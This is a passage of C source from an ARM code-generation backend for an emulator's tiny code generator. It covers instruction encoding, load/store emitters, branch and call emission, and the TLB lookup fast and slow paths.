tcg_out_ld32_12(s, cond, rd, TCG_REG_PC, 0); } static void tcg_out_movi32(TCGContext *s, int cond, int rd, uint32_t arg) { int rot, diff, opc, sh1, sh2; uint32_t tt0, tt1, tt2; /* Check a single MOV/MVN before anything else. */ rot = encode_imm(arg); if (rot >= 0) { tcg_out_dat_imm(s, cond, ARITH_MOV, rd, 0, rotl(arg, rot) | (rot << 7)); return; } rot = encode_imm(~arg); if (rot >= 0) { tcg_out_dat_imm(s, cond, ARITH_MVN, rd, 0, rotl(~arg, rot) | (rot << 7)); return; } /* Check for a pc-relative address. This will usually be the TB, or within the TB, which is immediately before the code block. */ diff = arg - ((intptr_t)s->code_ptr + 8); if (diff >= 0) { rot = encode_imm(diff); if (rot >= 0) { tcg_out_dat_imm(s, cond, ARITH_ADD, rd, TCG_REG_PC, rotl(diff, rot) | (rot << 7)); return; } } else { rot = encode_imm(-diff); if (rot >= 0) { tcg_out_dat_imm(s, cond, ARITH_SUB, rd, TCG_REG_PC, rotl(-diff, rot) | (rot << 7)); return; } } /* Use movw + movt. 
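   movw writes a zero-extended 16-bit immediate, and movt then fills the
   upper halfword, so any 32-bit constant costs at most two insns on v7;
   the movt is skipped when the upper 16 bits are zero.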
*/ if (use_armv7_instructions) { /* movw */ tcg_out32(s, (cond << 28) | 0x03000000 | (rd << 12) | ((arg << 4) & 0x000f0000) | (arg & 0xfff)); if (arg & 0xffff0000) { /* movt */ tcg_out32(s, (cond << 28) | 0x03400000 | (rd << 12) | ((arg >> 12) & 0x000f0000) | ((arg >> 16) & 0xfff)); } return; } /* Look for sequences of two insns. If we have lots of 1's, we can shorten the sequence by beginning with mvn and then clearing higher bits with eor. */ tt0 = arg; opc = ARITH_MOV; if (ctpop32(arg) > 16) { tt0 = ~arg; opc = ARITH_MVN; } sh1 = ctz32(tt0) & ~1; tt1 = tt0 & ~(0xff << sh1); sh2 = ctz32(tt1) & ~1; tt2 = tt1 & ~(0xff << sh2); if (tt2 == 0) { rot = ((32 - sh1) << 7) & 0xf00; tcg_out_dat_imm(s, cond, opc, rd, 0, ((tt0 >> sh1) & 0xff) | rot); rot = ((32 - sh2) << 7) & 0xf00; tcg_out_dat_imm(s, cond, ARITH_EOR, rd, rd, ((tt0 >> sh2) & 0xff) | rot); return; } /* Otherwise, drop it into the constant pool. */ tcg_out_movi_pool(s, cond, rd, arg); } static inline void tcg_out_dat_rI(TCGContext *s, int cond, int opc, TCGArg dst, TCGArg lhs, TCGArg rhs, int rhs_is_const) { /* Emit either the reg,imm or reg,reg form of a data-processing insn. * rhs must satisfy the "rI" constraint. */ if (rhs_is_const) { int rot = encode_imm(rhs); tcg_debug_assert(rot >= 0); tcg_out_dat_imm(s, cond, opc, dst, lhs, rotl(rhs, rot) | (rot << 7)); } else { tcg_out_dat_reg(s, cond, opc, dst, lhs, rhs, SHIFT_IMM_LSL(0)); } } static void tcg_out_dat_rIK(TCGContext *s, int cond, int opc, int opinv, TCGReg dst, TCGReg lhs, TCGArg rhs, bool rhs_is_const) { /* Emit either the reg,imm or reg,reg form of a data-processing insn. * rhs must satisfy the "rIK" constraint. */ if (rhs_is_const) { int rot = encode_imm(rhs); if (rot < 0) { rhs = ~rhs; rot = encode_imm(rhs); tcg_debug_assert(rot >= 0); opc = opinv; } tcg_out_dat_imm(s, cond, opc, dst, lhs, rotl(rhs, rot) | (rot << 7)); } else { tcg_out_dat_reg(s, cond, opc, dst, lhs, rhs, SHIFT_IMM_LSL(0)); } } static void tcg_out_dat_rIN(TCGContext *s, int cond, int opc, int opneg, TCGArg dst, TCGArg lhs, TCGArg rhs, bool rhs_is_const) { /* Emit either the reg,imm or reg,reg form of a data-processing insn. * rhs must satisfy the "rIN" constraint. */ if (rhs_is_const) { int rot = encode_imm(rhs); if (rot < 0) { rhs = -rhs; rot = encode_imm(rhs); tcg_debug_assert(rot >= 0); opc = opneg; } tcg_out_dat_imm(s, cond, opc, dst, lhs, rotl(rhs, rot) | (rot << 7)); } else { tcg_out_dat_reg(s, cond, opc, dst, lhs, rhs, SHIFT_IMM_LSL(0)); } } static inline void tcg_out_mul32(TCGContext *s, int cond, TCGReg rd, TCGReg rn, TCGReg rm) { /* if ArchVersion() < 6 && d == n then UNPREDICTABLE; */ if (!use_armv6_instructions && rd == rn) { if (rd == rm) { /* rd == rn == rm; copy an input to tmp first. 
*/ tcg_out_mov_reg(s, cond, TCG_REG_TMP, rn); rm = rn = TCG_REG_TMP; } else { rn = rm; rm = rd; } } /* mul */ tcg_out32(s, (cond << 28) | 0x90 | (rd << 16) | (rm << 8) | rn); } static inline void tcg_out_umull32(TCGContext *s, int cond, TCGReg rd0, TCGReg rd1, TCGReg rn, TCGReg rm) { /* if ArchVersion() < 6 && (dHi == n || dLo == n) then UNPREDICTABLE; */ if (!use_armv6_instructions && (rd0 == rn || rd1 == rn)) { if (rd0 == rm || rd1 == rm) { tcg_out_mov_reg(s, cond, TCG_REG_TMP, rn); rn = TCG_REG_TMP; } else { TCGReg t = rn; rn = rm; rm = t; } } /* umull */ tcg_out32(s, (cond << 28) | 0x00800090 | (rd1 << 16) | (rd0 << 12) | (rm << 8) | rn); } static inline void tcg_out_smull32(TCGContext *s, int cond, TCGReg rd0, TCGReg rd1, TCGReg rn, TCGReg rm) { /* if ArchVersion() < 6 && (dHi == n || dLo == n) then UNPREDICTABLE; */ if (!use_armv6_instructions && (rd0 == rn || rd1 == rn)) { if (rd0 == rm || rd1 == rm) { tcg_out_mov_reg(s, cond, TCG_REG_TMP, rn); rn = TCG_REG_TMP; } else { TCGReg t = rn; rn = rm; rm = t; } } /* smull */ tcg_out32(s, (cond << 28) | 0x00c00090 | (rd1 << 16) | (rd0 << 12) | (rm << 8) | rn); } static inline void tcg_out_sdiv(TCGContext *s, int cond, int rd, int rn, int rm) { tcg_out32(s, 0x0710f010 | (cond << 28) | (rd << 16) | rn | (rm << 8)); } static inline void tcg_out_udiv(TCGContext *s, int cond, int rd, int rn, int rm) { tcg_out32(s, 0x0730f010 | (cond << 28) | (rd << 16) | rn | (rm << 8)); } static inline void tcg_out_ext8s(TCGContext *s, int cond, int rd, int rn) { if (use_armv6_instructions) { /* sxtb */ tcg_out32(s, 0x06af0070 | (cond << 28) | (rd << 12) | rn); } else { tcg_out_dat_reg(s, cond, ARITH_MOV, rd, 0, rn, SHIFT_IMM_LSL(24)); tcg_out_dat_reg(s, cond, ARITH_MOV, rd, 0, rd, SHIFT_IMM_ASR(24)); } } static inline void tcg_out_ext8u(TCGContext *s, int cond, int rd, int rn) { tcg_out_dat_imm(s, cond, ARITH_AND, rd, rn, 0xff); } static inline void tcg_out_ext16s(TCGContext *s, int cond, int rd, int rn) { if (use_armv6_instructions) { /* sxth */ tcg_out32(s, 0x06bf0070 | (cond << 28) | (rd << 12) | rn); } else { tcg_out_dat_reg(s, cond, ARITH_MOV, rd, 0, rn, SHIFT_IMM_LSL(16)); tcg_out_dat_reg(s, cond, ARITH_MOV, rd, 0, rd, SHIFT_IMM_ASR(16)); } } static inline void tcg_out_ext16u(TCGContext *s, int cond, int rd, int rn) { if (use_armv6_instructions) { /* uxth */ tcg_out32(s, 0x06ff0070 | (cond << 28) | (rd << 12) | rn); } else { tcg_out_dat_reg(s, cond, ARITH_MOV, rd, 0, rn, SHIFT_IMM_LSL(16)); tcg_out_dat_reg(s, cond, ARITH_MOV, rd, 0, rd, SHIFT_IMM_LSR(16)); } } static inline void tcg_out_bswap16s(TCGContext *s, int cond, int rd, int rn) { if (use_armv6_instructions) { /* revsh */ tcg_out32(s, 0x06ff0fb0 | (cond << 28) | (rd << 12) | rn); } else { tcg_out_dat_reg(s, cond, ARITH_MOV, TCG_REG_TMP, 0, rn, SHIFT_IMM_LSL(24)); tcg_out_dat_reg(s, cond, ARITH_MOV, TCG_REG_TMP, 0, TCG_REG_TMP, SHIFT_IMM_ASR(16)); tcg_out_dat_reg(s, cond, ARITH_ORR, rd, TCG_REG_TMP, rn, SHIFT_IMM_LSR(8)); } } static inline void tcg_out_bswap16(TCGContext *s, int cond, int rd, int rn) { if (use_armv6_instructions) { /* rev16 */ tcg_out32(s, 0x06bf0fb0 | (cond << 28) | (rd << 12) | rn); } else { tcg_out_dat_reg(s, cond, ARITH_MOV, TCG_REG_TMP, 0, rn, SHIFT_IMM_LSL(24)); tcg_out_dat_reg(s, cond, ARITH_MOV, TCG_REG_TMP, 0, TCG_REG_TMP, SHIFT_IMM_LSR(16)); tcg_out_dat_reg(s, cond, ARITH_ORR, rd, TCG_REG_TMP, rn, SHIFT_IMM_LSR(8)); } } /* swap the two low bytes assuming that the two high input bytes and the two high output bit can hold any value. 
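   That is, the high input bytes need not be zero and the high output
   bytes may be garbage, which is fine when the result only feeds a
   16-bit store.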
*/ static inline void tcg_out_bswap16st(TCGContext *s, int cond, int rd, int rn) { if (use_armv6_instructions) { /* rev16 */ tcg_out32(s, 0x06bf0fb0 | (cond << 28) | (rd << 12) | rn); } else { tcg_out_dat_reg(s, cond, ARITH_MOV, TCG_REG_TMP, 0, rn, SHIFT_IMM_LSR(8)); tcg_out_dat_imm(s, cond, ARITH_AND, TCG_REG_TMP, TCG_REG_TMP, 0xff); tcg_out_dat_reg(s, cond, ARITH_ORR, rd, TCG_REG_TMP, rn, SHIFT_IMM_LSL(8)); } } static inline void tcg_out_bswap32(TCGContext *s, int cond, int rd, int rn) { if (use_armv6_instructions) { /* rev */ tcg_out32(s, 0x06bf0f30 | (cond << 28) | (rd << 12) | rn); } else { tcg_out_dat_reg(s, cond, ARITH_EOR, TCG_REG_TMP, rn, rn, SHIFT_IMM_ROR(16)); tcg_out_dat_imm(s, cond, ARITH_BIC, TCG_REG_TMP, TCG_REG_TMP, 0xff | 0x800); tcg_out_dat_reg(s, cond, ARITH_MOV, rd, 0, rn, SHIFT_IMM_ROR(8)); tcg_out_dat_reg(s, cond, ARITH_EOR, rd, rd, TCG_REG_TMP, SHIFT_IMM_LSR(8)); } } static inline void tcg_out_deposit(TCGContext *s, int cond, TCGReg rd, TCGArg a1, int ofs, int len, bool const_a1) { if (const_a1) { /* bfi becomes bfc with rn == 15. */ a1 = 15; } /* bfi/bfc */ tcg_out32(s, 0x07c00010 | (cond << 28) | (rd << 12) | a1 | (ofs << 7) | ((ofs + len - 1) << 16)); } static inline void tcg_out_extract(TCGContext *s, int cond, TCGReg rd, TCGArg a1, int ofs, int len) { /* ubfx */ tcg_out32(s, 0x07e00050 | (cond << 28) | (rd << 12) | a1 | (ofs << 7) | ((len - 1) << 16)); } static inline void tcg_out_sextract(TCGContext *s, int cond, TCGReg rd, TCGArg a1, int ofs, int len) { /* sbfx */ tcg_out32(s, 0x07a00050 | (cond << 28) | (rd << 12) | a1 | (ofs << 7) | ((len - 1) << 16)); } static inline void tcg_out_ld32u(TCGContext *s, int cond, int rd, int rn, int32_t offset) { if (offset > 0xfff || offset < -0xfff) { tcg_out_movi32(s, cond, TCG_REG_TMP, offset); tcg_out_ld32_r(s, cond, rd, rn, TCG_REG_TMP); } else tcg_out_ld32_12(s, cond, rd, rn, offset); } static inline void tcg_out_st32(TCGContext *s, int cond, int rd, int rn, int32_t offset) { if (offset > 0xfff || offset < -0xfff) { tcg_out_movi32(s, cond, TCG_REG_TMP, offset); tcg_out_st32_r(s, cond, rd, rn, TCG_REG_TMP); } else tcg_out_st32_12(s, cond, rd, rn, offset); } static inline void tcg_out_ld16u(TCGContext *s, int cond, int rd, int rn, int32_t offset) { if (offset > 0xff || offset < -0xff) { tcg_out_movi32(s, cond, TCG_REG_TMP, offset); tcg_out_ld16u_r(s, cond, rd, rn, TCG_REG_TMP); } else tcg_out_ld16u_8(s, cond, rd, rn, offset); } static inline void tcg_out_ld16s(TCGContext *s, int cond, int rd, int rn, int32_t offset) { if (offset > 0xff || offset < -0xff) { tcg_out_movi32(s, cond, TCG_REG_TMP, offset); tcg_out_ld16s_r(s, cond, rd, rn, TCG_REG_TMP); } else tcg_out_ld16s_8(s, cond, rd, rn, offset); } static inline void tcg_out_st16(TCGContext *s, int cond, int rd, int rn, int32_t offset) { if (offset > 0xff || offset < -0xff) { tcg_out_movi32(s, cond, TCG_REG_TMP, offset); tcg_out_st16_r(s, cond, rd, rn, TCG_REG_TMP); } else tcg_out_st16_8(s, cond, rd, rn, offset); } static inline void tcg_out_ld8u(TCGContext *s, int cond, int rd, int rn, int32_t offset) { if (offset > 0xfff || offset < -0xfff) { tcg_out_movi32(s, cond, TCG_REG_TMP, offset); tcg_out_ld8_r(s, cond, rd, rn, TCG_REG_TMP); } else tcg_out_ld8_12(s, cond, rd, rn, offset); } static inline void tcg_out_ld8s(TCGContext *s, int cond, int rd, int rn, int32_t offset) { if (offset > 0xff || offset < -0xff) { tcg_out_movi32(s, cond, TCG_REG_TMP, offset); tcg_out_ld8s_r(s, cond, rd, rn, TCG_REG_TMP); } else tcg_out_ld8s_8(s, cond, rd, rn, offset); } static inline void 
tcg_out_st8(TCGContext *s, int cond, int rd, int rn, int32_t offset) { if (offset > 0xfff || offset < -0xfff) { tcg_out_movi32(s, cond, TCG_REG_TMP, offset); tcg_out_st8_r(s, cond, rd, rn, TCG_REG_TMP); } else tcg_out_st8_12(s, cond, rd, rn, offset); } /* The _goto case is normally between TBs within the same code buffer, and * with the code buffer limited to 16MB we wouldn't need the long case. * But we also use it for the tail-call to the qemu_ld/st helpers, which does. */ static void tcg_out_goto(TCGContext *s, int cond, tcg_insn_unit *addr) { intptr_t addri = (intptr_t)addr; ptrdiff_t disp = tcg_pcrel_diff(s, addr); if ((addri & 1) == 0 && disp - 8 < 0x01fffffd && disp - 8 > -0x01fffffd) { tcg_out_b(s, cond, disp); return; } tcg_out_movi_pool(s, cond, TCG_REG_PC, addri); } /* The call case is mostly used for helpers - so it's not unreasonable * for them to be beyond branch range */ static void tcg_out_call(TCGContext *s, tcg_insn_unit *addr) { intptr_t addri = (intptr_t)addr; ptrdiff_t disp = tcg_pcrel_diff(s, addr); if (disp - 8 < 0x02000000 && disp - 8 >= -0x02000000) { if (addri & 1) { /* Use BLX if the target is in Thumb mode */ if (!use_armv5t_instructions) { tcg_abort(); } tcg_out_blx_imm(s, disp); } else { tcg_out_bl(s, COND_AL, disp); } } else if (use_armv7_instructions) { tcg_out_movi32(s, COND_AL, TCG_REG_TMP, addri); tcg_out_blx(s, COND_AL, TCG_REG_TMP); } else { /* ??? Know that movi_pool emits exactly 1 insn. */ tcg_out_dat_imm(s, COND_AL, ARITH_ADD, TCG_REG_R14, TCG_REG_PC, 0); tcg_out_movi_pool(s, COND_AL, TCG_REG_PC, addri); } } static inline void tcg_out_goto_label(TCGContext *s, int cond, TCGLabel *l) { if (l->has_value) { tcg_out_goto(s, cond, l->u.value_ptr); } else { tcg_out_reloc(s, s->code_ptr, R_ARM_PC24, l, 0); tcg_out_b(s, cond, 0); } } static inline void tcg_out_mb(TCGContext *s, TCGArg a0) { if (use_armv7_instructions) { tcg_out32(s, INSN_DMB_ISH); } else if (use_armv6_instructions) { tcg_out32(s, INSN_DMB_MCR); } } static TCGCond tcg_out_cmp2(TCGContext *s, const TCGArg *args, const int *const_args) { TCGReg al = args[0]; TCGReg ah = args[1]; TCGArg bl = args[2]; TCGArg bh = args[3]; TCGCond cond = args[4]; int const_bl = const_args[2]; int const_bh = const_args[3]; switch (cond) { case TCG_COND_EQ: case TCG_COND_NE: case TCG_COND_LTU: case TCG_COND_LEU: case TCG_COND_GTU: case TCG_COND_GEU: /* We perform a conditional comparison. If the high half is equal, then overwrite the flags with the comparison of the low half. The resulting flags cover the whole. */ tcg_out_dat_rI(s, COND_AL, ARITH_CMP, 0, ah, bh, const_bh); tcg_out_dat_rI(s, COND_EQ, ARITH_CMP, 0, al, bl, const_bl); return cond; case TCG_COND_LT: case TCG_COND_GE: /* We perform a double-word subtraction and examine the result. We do not actually need the result of the subtract, so the low part "subtract" is a compare. For the high half we have no choice but to compute into a temporary. */ tcg_out_dat_rI(s, COND_AL, ARITH_CMP, 0, al, bl, const_bl); tcg_out_dat_rI(s, COND_AL, ARITH_SBC | TO_CPSR, TCG_REG_TMP, ah, bh, const_bh); return cond; case TCG_COND_LE: case TCG_COND_GT: /* Similar, but with swapped arguments, via reversed subtract.
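   A sketch of the pair emitted below: rsbs tmp, al, bl then rscs tmp, ah, bh computes the double-word b - a, so the flags describe the reversed comparison and the swapped condition is returned.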
*/ tcg_out_dat_rI(s, COND_AL, ARITH_RSB | TO_CPSR, TCG_REG_TMP, al, bl, const_bl); tcg_out_dat_rI(s, COND_AL, ARITH_RSC | TO_CPSR, TCG_REG_TMP, ah, bh, const_bh); return tcg_swap_cond(cond); default: g_assert_not_reached(); } } #ifdef CONFIG_SOFTMMU #include "../tcg-ldst.inc.c" /* helper signature: helper_ret_ld_mmu(CPUState *env, target_ulong addr, * int mmu_idx, uintptr_t ra) */ static void * const qemu_ld_helpers[16] = { [MO_UB] = helper_ret_ldub_mmu, [MO_SB] = helper_ret_ldsb_mmu, [MO_LEUW] = helper_le_lduw_mmu, [MO_LEUL] = helper_le_ldul_mmu, [MO_LEQ] = helper_le_ldq_mmu, [MO_LESW] = helper_le_ldsw_mmu, [MO_LESL] = helper_le_ldul_mmu, [MO_BEUW] = helper_be_lduw_mmu, [MO_BEUL] = helper_be_ldul_mmu, [MO_BEQ] = helper_be_ldq_mmu, [MO_BESW] = helper_be_ldsw_mmu, [MO_BESL] = helper_be_ldul_mmu, }; /* helper signature: helper_ret_st_mmu(CPUState *env, target_ulong addr, * uintxx_t val, int mmu_idx, uintptr_t ra) */ static void * const qemu_st_helpers[16] = { [MO_UB] = helper_ret_stb_mmu, [MO_LEUW] = helper_le_stw_mmu, [MO_LEUL] = helper_le_stl_mmu, [MO_LEQ] = helper_le_stq_mmu, [MO_BEUW] = helper_be_stw_mmu, [MO_BEUL] = helper_be_stl_mmu, [MO_BEQ] = helper_be_stq_mmu, }; /* Helper routines for marshalling helper function arguments into * the correct registers and stack. * argreg is where we want to put this argument, arg is the argument itself. * Return value is the updated argreg ready for the next call. * Note that argreg 0..3 are real registers, 4+ on stack. * * We provide routines for arguments which are: immediate, 32 bit * value in register, 16 and 8 bit values in register (which must be zero * extended before use) and 64 bit value in a lo:hi register pair. */ #define DEFINE_TCG_OUT_ARG(NAME, ARGTYPE, MOV_ARG, EXT_ARG) \ static TCGReg NAME(TCGContext *s, TCGReg argreg, ARGTYPE arg) \ { \ if (argreg < 4) { \ MOV_ARG(s, COND_AL, argreg, arg); \ } else { \ int ofs = (argreg - 4) * 4; \ EXT_ARG; \ tcg_debug_assert(ofs + 4 <= TCG_STATIC_CALL_ARGS_SIZE); \ tcg_out_st32_12(s, COND_AL, arg, TCG_REG_CALL_STACK, ofs); \ } \ return argreg + 1; \ } DEFINE_TCG_OUT_ARG(tcg_out_arg_imm32, uint32_t, tcg_out_movi32, (tcg_out_movi32(s, COND_AL, TCG_REG_TMP, arg), arg = TCG_REG_TMP)) DEFINE_TCG_OUT_ARG(tcg_out_arg_reg8, TCGReg, tcg_out_ext8u, (tcg_out_ext8u(s, COND_AL, TCG_REG_TMP, arg), arg = TCG_REG_TMP)) DEFINE_TCG_OUT_ARG(tcg_out_arg_reg16, TCGReg, tcg_out_ext16u, (tcg_out_ext16u(s, COND_AL, TCG_REG_TMP, arg), arg = TCG_REG_TMP)) DEFINE_TCG_OUT_ARG(tcg_out_arg_reg32, TCGReg, tcg_out_mov_reg, ) static TCGReg tcg_out_arg_reg64(TCGContext *s, TCGReg argreg, TCGReg arglo, TCGReg arghi) { /* 64 bit arguments must go in even/odd register pairs * and in 8-aligned stack slots. */ if (argreg & 1) { argreg++; } if (use_armv6_instructions && argreg >= 4 && (arglo & 1) == 0 && arghi == arglo + 1) { tcg_out_strd_8(s, COND_AL, arglo, TCG_REG_CALL_STACK, (argreg - 4) * 4); return argreg + 2; } else { argreg = tcg_out_arg_reg32(s, argreg, arglo); argreg = tcg_out_arg_reg32(s, argreg, arghi); return argreg; } } #define TLB_SHIFT (CPU_TLB_ENTRY_BITS + CPU_TLB_BITS) /* We expect to use a 9-bit sign-magnitude negative offset from ENV. */ QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) > 0); QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) < -256); /* These offsets are built into the LDRD below. */ QEMU_BUILD_BUG_ON(offsetof(CPUTLBDescFast, mask) != 0); QEMU_BUILD_BUG_ON(offsetof(CPUTLBDescFast, table) != 4); /* Load and compare a TLB entry, leaving the flags set. Returns the register containing the addend of the tlb entry.
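   In outline, the fast path emitted below: load {mask,table} for mem_index, AND the masked address bits into R0 to form the TLB index, fetch the comparator into R2/R3 and the addend into R1, then compare the page-aligned (and alignment-checked) address against the comparator.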
Clobbers R0, R1, R2, TMP. */ static TCGReg tcg_out_tlb_read(TCGContext *s, TCGReg addrlo, TCGReg addrhi, MemOp opc, int mem_index, bool is_load) { #ifdef TARGET_ARM struct uc_struct *uc = s->uc; #endif int cmp_off = (is_load ? offsetof(CPUTLBEntry, addr_read) : offsetof(CPUTLBEntry, addr_write)); int fast_off = TLB_MASK_TABLE_OFS(mem_index); int mask_off = fast_off + offsetof(CPUTLBDescFast, mask); int table_off = fast_off + offsetof(CPUTLBDescFast, table); unsigned s_bits = opc & MO_SIZE; unsigned a_bits = get_alignment_bits(opc); /* * We don't support inline unaligned accesses, but we can easily * support overalignment checks. */ if (a_bits < s_bits) { a_bits = s_bits; } /* Load env_tlb(env)->f[mmu_idx].{mask,table} into {r0,r1}. */ if (use_armv6_instructions) { tcg_out_ldrd_8(s, COND_AL, TCG_REG_R0, TCG_AREG0, fast_off); } else { tcg_out_ld(s, TCG_TYPE_I32, TCG_REG_R0, TCG_AREG0, mask_off); tcg_out_ld(s, TCG_TYPE_I32, TCG_REG_R1, TCG_AREG0, table_off); } /* Extract the tlb index from the address into R0. */ tcg_out_dat_reg(s, COND_AL, ARITH_AND, TCG_REG_R0, TCG_REG_R0, addrlo, SHIFT_IMM_LSR(TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS)); /* * Add the tlb_table pointer, creating the CPUTLBEntry address in R1. * Load the tlb comparator into R2/R3 and the fast path addend into R1. */ if (cmp_off == 0) { if (use_armv6_instructions && TARGET_LONG_BITS == 64) { tcg_out_ldrd_rwb(s, COND_AL, TCG_REG_R2, TCG_REG_R1, TCG_REG_R0); } else { tcg_out_ld32_rwb(s, COND_AL, TCG_REG_R2, TCG_REG_R1, TCG_REG_R0); } } else { tcg_out_dat_reg(s, COND_AL, ARITH_ADD, TCG_REG_R1, TCG_REG_R1, TCG_REG_R0, 0); if (use_armv6_instructions && TARGET_LONG_BITS == 64) { tcg_out_ldrd_8(s, COND_AL, TCG_REG_R2, TCG_REG_R1, cmp_off); } else { tcg_out_ld32_12(s, COND_AL, TCG_REG_R2, TCG_REG_R1, cmp_off); } } if (!use_armv6_instructions && TARGET_LONG_BITS == 64) { tcg_out_ld32_12(s, COND_AL, TCG_REG_R3, TCG_REG_R1, cmp_off + 4); } /* Load the tlb addend. */ tcg_out_ld32_12(s, COND_AL, TCG_REG_R1, TCG_REG_R1, offsetof(CPUTLBEntry, addend)); /* * Check alignment, check comparators. * Do this in no more than 3 insns. Use MOVW for v7, if possible, * to reduce the number of sequential conditional instructions. * Almost all guests have at least 4k pages, which means that we need * to clear at least 9 bits even for an 8-byte memory, which means it * isn't worth checking for an immediate operand for BIC. */ if (use_armv7_instructions && TARGET_PAGE_BITS <= 16) { tcg_target_ulong mask = ~(TARGET_PAGE_MASK | ((1 << a_bits) - 1)); tcg_out_movi32(s, COND_AL, TCG_REG_TMP, mask); tcg_out_dat_reg(s, COND_AL, ARITH_BIC, TCG_REG_TMP, addrlo, TCG_REG_TMP, 0); tcg_out_dat_reg(s, COND_AL, ARITH_CMP, 0, TCG_REG_R2, TCG_REG_TMP, 0); } else { if (a_bits) { tcg_out_dat_imm(s, COND_AL, ARITH_TST, 0, addrlo, (1 << a_bits) - 1); } tcg_out_dat_reg(s, COND_AL, ARITH_MOV, TCG_REG_TMP, 0, addrlo, SHIFT_IMM_LSR(TARGET_PAGE_BITS)); tcg_out_dat_reg(s, (a_bits ? COND_EQ : COND_AL), ARITH_CMP, 0, TCG_REG_R2, TCG_REG_TMP, SHIFT_IMM_LSL(TARGET_PAGE_BITS)); } if (TARGET_LONG_BITS == 64) { tcg_out_dat_reg(s, COND_EQ, ARITH_CMP, 0, TCG_REG_R3, addrhi, 0); } return TCG_REG_R1; } /* Record the context of a call to the out of line helper code for the slow path for a load or store, so that we can later generate the correct helper code.
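   The record keeps the operand registers, the memop index, the fast-path return address and the branch to patch; tcg_out_qemu_ld_slow_path and tcg_out_qemu_st_slow_path below consume it.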
*/ static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOpIdx oi, TCGReg datalo, TCGReg datahi, TCGReg addrlo, TCGReg addrhi, tcg_insn_unit *raddr, tcg_insn_unit *label_ptr) { TCGLabelQemuLdst *label = new_ldst_label(s); label->is_ld = is_ld; label->oi = oi; label->datalo_reg = datalo; label->datahi_reg = datahi; label->addrlo_reg = addrlo; label->addrhi_reg = addrhi; label->raddr = raddr; label->label_ptr[0] = label_ptr; } static bool tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) { TCGReg argreg, datalo, datahi; TCGMemOpIdx oi = lb->oi; MemOp opc = get_memop(oi); void *func; if (!reloc_pc24(lb->label_ptr[0], s->code_ptr)) { return false; } argreg = tcg_out_arg_reg32(s, TCG_REG_R0, TCG_AREG0); if (TARGET_LONG_BITS == 64) { argreg = tcg_out_arg_reg64(s, argreg, lb->addrlo_reg, lb->addrhi_reg); } else { argreg = tcg_out_arg_reg32(s, argreg, lb->addrlo_reg); } argreg = tcg_out_arg_imm32(s, argreg, oi); argreg = tcg_out_arg_reg32(s, argreg, TCG_REG_R14); /* For armv6 we can use the canonical unsigned helpers and minimize icache usage. For pre-armv6, use the signed helpers since we do not have a single insn sign-extend. */ if (use_armv6_instructions) { func = qemu_ld_helpers[opc & (MO_BSWAP | MO_SIZE)]; } else { func = qemu_ld_helpers[opc & (MO_BSWAP | MO_SSIZE)]; if (opc & MO_SIGN) { opc = MO_UL; } } tcg_out_call(s, func); datalo = lb->datalo_reg; datahi = lb->datahi_reg; switch (opc & MO_SSIZE) { case MO_SB: tcg_out_ext8s(s, COND_AL, datalo, TCG_REG_R0); break; case MO_SW: tcg_out_ext16s(s, COND_AL, datalo, TCG_REG_R0); break; default: tcg_out_mov_reg(s, COND_AL, datalo, TCG_REG_R0); break; case MO_Q: if (datalo != TCG_REG_R1) { tcg_out_mov_reg(s, COND_AL, datalo, TCG_REG_R0); tcg_out_mov_reg(s, COND_AL, datahi, TCG_REG_R1); } else if (datahi != TCG_REG_R0) { tcg_out_mov_reg(s, COND_AL, datahi, TCG_REG_R1); tcg_out_mov_reg(s, COND_AL, datalo, TCG_REG_R0); } else { tcg_out_mov_reg(s, COND_AL, TCG_REG_TMP, TCG_REG_R0); tcg_out_mov_reg(s, COND_AL, datahi, TCG_REG_R1); tcg_out_mov_reg(s, COND_AL, datalo, TCG_REG_TMP); } break; } tcg_out_goto(s, COND_AL, lb->raddr); return true; } static bool tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) { TCGReg argreg, datalo, datahi; TCGMemOpIdx oi = lb->oi; MemOp opc = get_memop(oi); if (!reloc_pc24(lb->label_ptr[0], s->code_ptr)) { return false; } argreg = TCG_REG_R0; argreg = tcg_out_arg_reg32(s, argreg, TCG_AREG0); if (TARGET_LONG_BITS == 64) { argreg = tcg_out_arg_reg64(s, argreg, lb->addrlo_reg, lb->addrhi_reg); } else { argreg = tcg_out_arg_reg32(s, argreg, lb->addrlo_reg); } datalo = lb->datalo_reg; datahi = lb->datahi_reg; switch (opc & MO_SIZE) { case MO_8: argreg = tcg_out_arg_reg8(s, argreg, datalo); break; case MO_16: argreg = tcg_out_arg_reg16(s, argreg, datalo); break; case MO_32: default: argreg = tcg_out_arg_reg32(s, argreg, datalo); break; case MO_64: argreg = tcg_out_arg_reg64(s, argreg, datalo, datahi); break; } argreg = tcg_out_arg_imm32(s, argreg, oi); argreg = tcg_out_arg_reg32(s, argreg, TCG_REG_R14); /* Tail-call to the helper, which will return to the fast path. 
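   LR still holds the fast-path continuation stored by the conditional BL that entered this slow path, so a plain branch suffices and the helper's own return lands back on the fast path.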
*/ tcg_out_goto(s, COND_AL, qemu_st_helpers[opc & (MO_BSWAP | MO_SIZE)]); return true; } #endif /* SOFTMMU */ static inline void tcg_out_qemu_ld_index(TCGContext *s, MemOp opc, TCGReg datalo, TCGReg datahi, TCGReg addrlo, TCGReg addend) { MemOp bswap = opc & MO_BSWAP; switch (opc & MO_SSIZE) { case MO_UB: tcg_out_ld8_r(s, COND_AL, datalo, addrlo, addend); break; case MO_SB: tcg_out_ld8s_r(s, COND_AL, datalo, addrlo, addend); break; case MO_UW: tcg_out_ld16u_r(s, COND_AL, datalo, addrlo, addend); if (bswap) { tcg_out_bswap16(s, COND_AL, datalo, datalo); } break; case MO_SW: if (bswap) { tcg_out_ld16u_r(s, COND_AL, datalo, addrlo, addend); tcg_out_bswap16s(s, COND_AL, datalo, datalo); } else { tcg_out_ld16s_r(s, COND_AL, datalo, addrlo, addend); } break; case MO_UL: default: tcg_out_ld32_r(s, COND_AL, datalo, addrlo, addend); if (bswap) { tcg_out_bswap32(s, COND_AL, datalo, datalo); } break; case MO_Q: { TCGReg dl = (bswap ? datahi : datalo); TCGReg dh = (bswap ? datalo : datahi); /* Avoid ldrd for user-only emulation, to handle unaligned. */ if (USING_SOFTMMU && use_armv6_instructions && (dl & 1) == 0 && dh == dl + 1) { tcg_out_ldrd_r(s, COND_AL, 